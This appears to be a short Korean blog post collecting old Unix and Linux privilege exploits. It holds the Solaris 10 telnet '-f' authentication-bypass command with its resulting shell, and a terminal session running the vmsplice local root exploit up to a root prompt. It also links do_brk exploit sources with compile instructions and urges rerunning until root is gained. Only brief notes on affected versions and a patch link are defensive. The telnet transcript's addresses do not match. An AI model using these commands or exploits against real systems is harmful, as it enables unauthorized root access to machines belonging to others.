내 남자의 길~!

■공개일

2007-02-11

 

■문제점

Solaris 10 버전에는 root 이외의 유저 계정으로 텔넷의 인증을 회피할 수 있다.

 

■실행결과

 

# telnet -l"-fbin" 192.168.0.1

Trying 192.168.32.130...

Connected to 192.168.0.1.

Escape character is '^]'.

Last login: Wed Jun 18 22:25:02 from 192.168.32.1

Sun Microsystems Inc.   SunOS 5.10      Generic January 2005

$

Linux 2.6.17 - 2.6.24.1 해당되며, 아래에서 보시는 것과 같이 root 로 바로 switching 됩니다.
hehe@oops:/tmp$ uname -a
Linux oops.host 2.6.18 #1 SMP Fri Sep 22 13:02:54 KST 2006 i686 GNU/Linux
hehe@oops:/tmp$ id
uid=1000(hehe) gid=100(users) groups=100(users)
hehe@oops:/tmp$ ./xx
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7dfd000 .. 0xb7e2f000
[+] root
hehe@oops:/tmp# id
uid=0(root) gid=0(root) groups=100(users)

vmsplice() 시스템 콜에 보안 구멍이 있는 것이 원인이라고 합니다. 버그가 있는 버전은 2.6.17 부터 2.6.24.1 이며, 현재 최신 버전은 오늘 나온 2.6.24.2입니다. 사실상 최근에 설치한 서버 모두가 대상입니다.

위에서 말했듯, 시스템에 일반 사용자 계정이 있어야 이용할 수 있는 버그이며, 네트워크를 통해 무차별 다수에게 공격을 가할 수 있는 성질의 버그는 아닙니다.

따라서 혼자 쓰는 리눅스 데스크톱이라면 전혀 위험하지 않습니다. 리눅스 서버라도 그렇게 크게 위험한 것은 아니지만, 자신의 서버에 수상쩍은 인물이 살고 있다 싶으면 조심하는 것이 좋겠습니다.

리눅스 데스크톱에서 프로그램 돌려보니까 바로 root 쉘이 떠버리네요. -o-;; 다른 서버 몇몇도 테스트해봤는데, 젠투 서버에서는 컴파일 오류가 나지만 소스 코드를 약간 수정하니까 되고, 우분투 서버는 잘 뚫립니다. 뭐, 버그 리포트도 된 상태이니 곧 패치가 나오겠지요.

첫 실행에 안되면 한번 더 실행해 보자.. 될때까지 실행하면 됨

http://www.milw0rm.com/exploits/5092

패치하는 파일 소스

리눅스 커널 2.4.22 이하 루트 획득 exploit 이다.
그 서버에 계정이 있어야 하겠지만 말이다.

do_brk() exploit 소스  (컴파일은 gcc -static 소스명 -o 실행파일명)
http://packetstorm.linuxsecurity.com/0312-exploits/hatorihanzo.c

대표적인 커널 취약점인 do_brk()의 결점을 보안하기 위해서 방어모듈을 이용하여 패치를 하였습니다.
패치 방법입니다.
http://www.joinc.co.kr/modules/moniwiki/wiki.php/Site/Joinc/SiteAdmin/2006/8/24